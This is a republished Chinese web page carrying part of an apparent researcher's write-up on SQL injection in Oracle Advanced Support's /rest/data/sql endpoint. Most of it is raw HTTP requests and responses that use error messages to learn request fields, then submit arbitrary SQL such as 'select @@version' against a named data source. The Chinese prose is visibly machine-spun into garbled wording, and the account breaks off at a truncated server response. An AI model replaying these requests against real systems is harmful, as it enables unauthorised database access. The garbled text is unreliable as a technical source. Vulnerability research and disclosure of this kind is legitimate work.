作家
登录

Oracle Advanced Support系统SQL注入漏洞挖掘经验分享

作者: 来源: 2017-09-08 08:56:34 阅读 我要评论

HTTP Request: 
  • POST /rest/data/sql HTTP/1.1 
  • Host: host 
  • Connection: close 
  • Accept: application/json;charset=UTF-8 
  • Accept-Encoding: gzip, deflate, sdch 
  • Accept-Language: en-US,en;q=0.8 
  • Content-Type: application/json 
  • Content-Length: 0 
  • {} 
  • HTTP Response: 
  • HTTP/1.1 500 Internal Server Error 
  • Content-Type: text/html 
  • Content-Length: 71 
  • Connection: close 
  • A system error has occurred: Column 'SQL_NAME' cannot be null [X64Q53Q] 
    1. HTTP Request: 
    2. POST /rest/data/sql HTTP/1.1 
    3. Host: host 
    4. Connection: close 
    5. Accept-Encoding: gzip, deflate, sdch 
    6. Accept-Language: en-US,en;q=0.8 
    7. Content-Length: 16 
    8. Content-Type: application/json;charset=UTF-8 
    9. {"test":1} 
    10. HTTP Response: 
    11. HTTP/1.1 400 Bad Request  
    12. Content-Type: text/plain 
    13. Content-Length: 365 
    14. Connection: close 
    15. Unrecognized field "test" (class com.oracle.acs.gateway.model.NamedSQL), not marked as ignorable (6 known properties: "privileges", "id", "paramList", "name", "sql", "dataSourceJNDI"])  
    16.  at [Source: org.glassfish.jersey.message.internal.EntityInputStream@1c2f9d9d; line: 1, column: 14] (through reference chain: com.oracle.acs.gateway.model.NamedSQL["SQL_NAME"]) 

    再一次不料外的获得了一个关于未知“test”字段的bad request,然则如不雅你留意的话,这个缺点的信息给我们返回了一些有效的属性。感激 Oracle师长教师的办事!这些属性也同样出现了大年夜getNamedSqlList发出请求获得的返回中。我应用getNamedSqlList请求的返回中个中的一个值赋给dataSourceJNDI属性。

    1. HTTP Request: 
    2. POST /rest/data/sql HTTP/1.1 
    3. Host: host 
    4. Connection: close 
    5. Accept-Encoding: gzip, deflate, sdch 
    6. Accept-Language: en-US,en;q=0.8 
    7. Content-Length: 101 
    8. Content-Type: application/json;charset=UTF-8 
    9.     "name": "test", 
    10.     "sql":"select @@version", 
    11.     "dataSourceJNDI":"jdbc/portal" 

    这看起来是一个很好的测试请求,我们来见证一下 他是否有效。

    1. HTTP Response: 
    2. HTTP/1.1 500 Internal Server Error  
    3. Content-Type: text/plain 
    4. Content-Length: 200 
    5. Connection: close 

        推荐阅读

        解读大数据行业在2017年的新发展

      跟着科技的进步,大年夜数据大年夜科学前沿逐渐深刻到各行业。2017年中国的大年夜数据行业有什么新动态?大年夜数据行颐魅整体市场范围若何?大年夜数据行业前景若何?若何助力企业成长?今日的比格数据,我们来一路解读>>>详细阅读


      本文标题:Oracle Advanced Support系统SQL注入漏洞挖掘经验分享

      地址:http://www.17bianji.com/lsqh/37236.html

    关键词: 探索发现

    乐购科技部分新闻及文章转载自互联网,供读者交流和学习,若有涉及作者版权等问题请及时与我们联系,以便更正、删除或按规定办理。感谢所有提供资讯的网站,欢迎各类媒体与乐购科技进行文章共享合作。

    网友点评
    自媒体专栏

    评论

    热度

    精彩导读
    栏目ID=71的表不存在(操作类型=0)